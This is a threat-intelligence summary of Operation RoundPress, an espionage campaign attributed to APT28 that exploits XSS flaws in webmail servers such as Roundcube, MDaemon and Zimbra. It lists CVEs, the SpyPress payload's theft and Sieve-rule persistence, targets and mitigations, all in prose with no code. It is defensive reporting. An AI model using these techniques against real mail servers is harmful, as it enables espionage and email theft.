Full Report
A Russia-linked threat actor has been attributed to a cyber espionage operation targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities, including a then-zero-day in MDaemon, according to new findings from ESET. The activity, which commenced in 2023, has been codenamed Operation RoundPress by the Slovak cybersecurity company. It has
Analysis Summary
# Threat Actor: APT28 (Operation RoundPress)
## Attribution & Identity
The threat actor is attributed with **medium confidence** to the Russian state-sponsored hacking group **APT28**.
Known Aliases/Associated Groups: BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. The campaign itself is codenamed **Operation RoundPress**.
## Activity Summary
Operation RoundPress is a cyber espionage operation commencing in 2023, focused on exfiltrating confidential data from targeted email accounts. The activity involves exploiting Cross-Site Scripting (XSS) vulnerabilities in commercial webmail servers. Attribution to APT28 is based on overlapping email addresses used in spear-phishing and server configuration similarities. A key aspect of this operation included the exploitation of a then-zero-day vulnerability in MDaemon (CVE-2024-11182). The fundamental goal is email theft.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Exploitation of XSS vulnerabilities in webmail portals (Horde, MDaemon, Zimbra, Roundcube) via spear-phishing emails where the malicious code resides in the HTML body.
- **Execution:** Execution of arbitrary JavaScript code within the context of the webmail client’s browser window, requiring the victim to open the message in the vulnerable web portal.
- **Credential/Data Theft:** Execution of an obfuscated JavaScript payload named **SpyPress** to steal webmail credentials, harvest email messages, and steal contact information.
- **Persistence/Evasion (Roundcube Variant):** SpyPress.ROUNDCUBE variants can create **Sieve rules** to forward copies of all incoming emails indefinitely to an attacker-controlled address, ensuring persistence even if subsequent malicious scripts are blocked.
- **Access Maintenance (MDaemon Variant):** Certain variants can capture 2FA codes and create application passwords for MDaemon to maintain mailbox access post-compromise.
- **Exfiltration:** Gathering information via HTTP POST requests to a hard-coded Command-and-Control (C2) server.
- **Vulnerabilities Exploited:**
- MDaemon XSS (used as a zero-day, later patched as **CVE-2024-11182**).
- Roundcube (**CVE-2023-43770** - on CISA KEV).
- Zimbra (**CVE-2024-27443**).
- Horde (unspecified old flaw fixed in Horde Webmail 1.0 from 2007).
- APT28 previously abused Roundcube flaws like CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026.
## Targeting
- **Sectors:** Governmental entities, defense companies, military organizations, and academic organizations.
- **Geography:** Primary targets observed in **Eastern Europe** (specifically Ukrainian governmental entities and defense companies in Bulgaria and Romania, some producing Soviet-era weapons). Other targets include governments/entities in **Africa, Europe, and South America** (e.g., Greece, Cameroon, Ecuador, Serbia, and Cyprus).
- **Victims:** Specific organizations were not named beyond sector and geography, but they include entities related to defense supply chains for Ukraine.
## Tools & Infrastructure
- **Malware Families Used:** **SpyPress** (JavaScript payload), including variants like **SpyPress.ROUNDCUBE**.
- **Infrastructure (C2):** Exfiltration occurs via HTTP POST requests to a hard-coded C2 server (details not specified).
## Implications
APT28 continues to prioritize high-value, espionage-driven objectives utilizing supply chain/external facing services (webmail) as a preferred entry point. The group’s willingness to use zero-day vulnerabilities (MDaemon XSS) demonstrates high operational sophistication and focus on specific, high-impact targets. The use of Sieve rules is a significant tactic for ensuring persistent backdoor access to vital email communications even after automated defenses address the initial exploit. Given the targeting of defense contractors supplying Ukraine, this activity directly supports Russian geopolitical intelligence gathering.
## Mitigations
- **Patch Management:** Immediately patch all webmail servers (Roundcube, Zimbra, MDaemon, Horde) against known vulnerabilities (e.g., CVE-2023-43770, CVE-2024-27443, CVE-2024-11182) and ensure servers are running the latest versions, as many victims were running outdated, vulnerable software.
- **Email Security:** Enhance email gateway filtering to detect and quarantine emails containing complex, embedded HTML/scripting that may trigger XSS vulnerabilities, even if the visible email content appears benign.
- **User Training:** Implement rigorous training emphasizing that malicious code can execute simply by viewing an email in a webmail interface and users must be vigilant against unexpected emails.
- **Configuration Hardening:** Review webmail server configurations for overly permissive settings that might allow script execution or modification of server-side rules (like Sieve rules).
- **MFA/Password Rotation:** Due to the malware's ability to steal credentials and potentially 2FA codes or create application passwords, enforce strong Multi-Factor Authentication (MFA) and regularly cycle passwords if suspicious activity is noted.